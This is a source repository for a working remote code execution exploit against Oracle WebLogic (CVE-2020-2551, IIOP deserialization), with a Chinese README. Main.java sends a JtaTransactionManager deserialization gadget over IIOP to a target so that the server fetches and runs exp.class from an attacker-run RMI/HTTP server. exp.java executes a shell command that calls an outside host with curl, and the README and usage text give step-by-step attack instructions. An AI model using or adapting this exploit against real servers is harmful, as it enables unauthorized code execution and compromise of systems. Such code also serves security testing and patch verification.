Repository: Y4er/CVE-2020-2551
Branch: master
Commit: 81ce92ab8def
Files: 12
Total size: 52.5 MB

Directory structure:
gitextract_0f86yukl/

├── .gitignore
├── Makefile
├── README.md
├── build.xml
├── src/
│   ├── META-INF/
│   │   └── MANIFEST.MF
│   ├── com/
│   │   └── payload/
│   │       └── Main.java
│   ├── exp.java
│   └── lib/
│       ├── com.bea.core.repackaged.apache.commons.logging_1.2.1.jar
│       ├── com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar
│       ├── permit-reflect-0.3.jar
│       └── wlfullclient.jar
└── weblogic_CVE_2020_2551.iml

================================================
FILE CONTENTS
================================================

================================================
FILE: .gitignore
================================================
# Created by .ignore support plugin (hsz.mobi)
### Java template
# Compiled class file
*.class

# Log file
*.log

# BlueJ files
*.ctxt

# Mobile Tools for Java (J2ME)
.mtj.tmp/

# Package Files #
*.war
*.nar
*.ear
*.zip
*.tar.gz
*.rar

# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
hs_err_pid*

.idea
out

================================================
FILE: Makefile
================================================
all:
	ant run
	javac src/exp.java
	#cd src; sudo python3 -m http.server 80


================================================
FILE: README.md
================================================
## CVE-2020-2551
Weblogic IIOP 反序列化

## 测试环境
Weblogic10.3.6+jdk1.6

[打包好的jar包](https://pan.baidu.com/s/1WancKEtKzXDxwWP0zz3QPg) 提取码：a6ob 

## 漏洞利用
下载jar包，然后使用marshalsec起一个恶意的RMI服务，本地编译一个exp.java
```java
package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
```

**尽量使用和weblogic相同的jdk版本和依赖库(wlfullclient.jar)编译** 然后本地起一个web服务器

```
python -m http.server --bind 0.0.0.0 80
```

命令行运行jar包
```
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
```
实际效果如图
![image](https://user-images.githubusercontent.com/40487319/75524749-81804100-5a49-11ea-8409-20746ca09299.gif)

## 已知问题
很多小伙伴都说复现不成功，看了网上的一些文章发现IIOP存在nat模式的问题，今天发现先知上有了 https://xz.aliyun.com/t/7498 各位自行移步。

## 参考

https://y4er.com/post/weblogic-cve-2020-2551/


================================================
FILE: build.xml
================================================
<project name="weblogic_CVE_2020_2551" basedir=".">
  <property name="lib.dir"     value="src/lib"/>
  <property name="src.dir"     value="src"/>
  <property name="build.dir"   value="build"/>
  <property name="classes.dir" value="${build.dir}/classes"/>
  <property name="jar.dir"     value="${build.dir}/jar"/>
  <property name="jar.dir.tmp" value="${build.dir}/jar.tmp"/>
  <property name="main-class"  value="com/payload/Main"/>

  <path id="classpath">
    <fileset dir="${lib.dir}" includes="**/*.jar"/>
  </path>

  <target name="clean">
    <delete dir="${build.dir}"/>
  </target>

  <target name="compile">
    <mkdir dir="${classes.dir}"/>
    <javac srcdir="${src.dir}" target="1.6" source="1.6" destdir="build/classes" classpathref="classpath"/>
  </target>

  <target name="jar" depends="compile">
    <mkdir dir="${jar.dir}"/>
    <jar destfile="${jar.dir}/${ant.project.name}.jar" basedir="${classes.dir}">
        <manifest>
            <attribute name="Main-Class" value="com/payload/Main" />
        </manifest>
      <zipgroupfileset dir="src/lib" />
    </jar>
  </target>

  <target name="run" depends="jar">
    <java jar="${jar.dir}/${ant.project.name}.jar" fork="true"/>
  </target>
</project>


================================================
FILE: src/META-INF/MANIFEST.MF
================================================
Manifest-Version: 1.0
Main-Class: com.payload.Main



================================================
FILE: src/com/payload/Main.java
================================================
package com.payload;

import com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager;
import com.nqzero.permit.Permit;

import javax.naming.Context;
import javax.naming.InitialContext;
import java.lang.reflect.*;
import java.rmi.Remote;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;

public class Main {

    public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";

    public static void main(String[] args) {
        try {
            if (args.length != 3) {
                System.out.println("java -jar IIOP_CVE_2020_2551.jar rhost rport rmiurl");
                System.out.println("java -jar IIOP_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp");
                System.out.println("先起一个RMIRefServer服务");
                System.out.println("java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer \"http://172.16.1.1/#exp\" 1099");
                System.out.println("jdk1.6\\bin\\javac exp.java 将生成的exp.class放入当前目录");
                System.out.println("exp.class目录起一个WEB服务 python3 -m http.server --bind 0.0.0.0 80");
                System.out.println("test on weblogic 10.3.6 success!");
                System.out.println("welcome to myblog: http://Y4er.com");
                System.exit(0);
            }
            String ip = args[0];
            String port = args[1];
            String rmiurl = args[2];
            String rhost = String.format("iiop://%s:%s", ip, port);

            Hashtable<String, String> env = new Hashtable<String, String>();
            // add wlsserver/server/lib/weblogic.jar to classpath,else will error.
            env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
            env.put("java.naming.provider.url", rhost);
            Context context = new InitialContext(env);
            // get Object to Deserialize
            JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
            jtaTransactionManager.setUserTransactionName(rmiurl);

            Remote remote = createMemoitizedProxy(createMap("pwned"+System.nanoTime(), jtaTransactionManager), Remote.class);
            context.rebind("Y4er"+System.nanoTime(), remote);
        } catch (Exception ex) {
            ex.printStackTrace();
            System.out.println("------------------------");
            System.out.println("----没有回显   自行检测----");
            System.out.println("------------------------");
        }
    }

    public static <T> T createMemoitizedProxy(final Map<String, Object> map, final Class<T> iface, final Class<?>... ifaces) throws Exception {
        return createProxy(createMemoizedInvocationHandler(map), iface, ifaces);
    }

    public static InvocationHandler createMemoizedInvocationHandler(final Map<String, Object> map) throws Exception {
        return (InvocationHandler) getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
    }

    public static Constructor<?> getFirstCtor(final String name) throws Exception {
        final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[0];
        setAccessible(ctor);
        return ctor;
    }

    public static void setAccessible(AccessibleObject member) {
        // quiet runtime warnings from JDK9+
        Permit.setAccessible(member);
    }

    public static <T> T createProxy(final InvocationHandler ih, final Class<T> iface, final Class<?>... ifaces) {
        final Class<?>[] allIfaces = (Class<?>[]) Array.newInstance(Class.class, ifaces.length + 1);
        allIfaces[0] = iface;
        if (ifaces.length > 0) {
            System.arraycopy(ifaces, 0, allIfaces, 1, ifaces.length);
        }
        return iface.cast(Proxy.newProxyInstance(Main.class.getClassLoader(), allIfaces, ih));
    }

    public static Map<String, Object> createMap(final String key, final Object val) {
        final Map<String, Object> map = new HashMap<String, Object>();
        map.put(key, val);
        return map;
    }
}


================================================
FILE: src/exp.java
================================================
package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}


================================================
FILE: src/lib/wlfullclient.jar
================================================
[File too large to display: 52.5 MB]

================================================
FILE: weblogic_CVE_2020_2551.iml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<module type="JAVA_MODULE" version="4">
  <component name="NewModuleRootManager" inherit-compiler-output="true">
    <exclude-output />
    <content url="file://$MODULE_DIR$">
      <sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
    </content>
    <orderEntry type="inheritedJdk" />
    <orderEntry type="sourceFolder" forTests="false" />
    <orderEntry type="library" name="lib" level="project" />
  </component>
</module>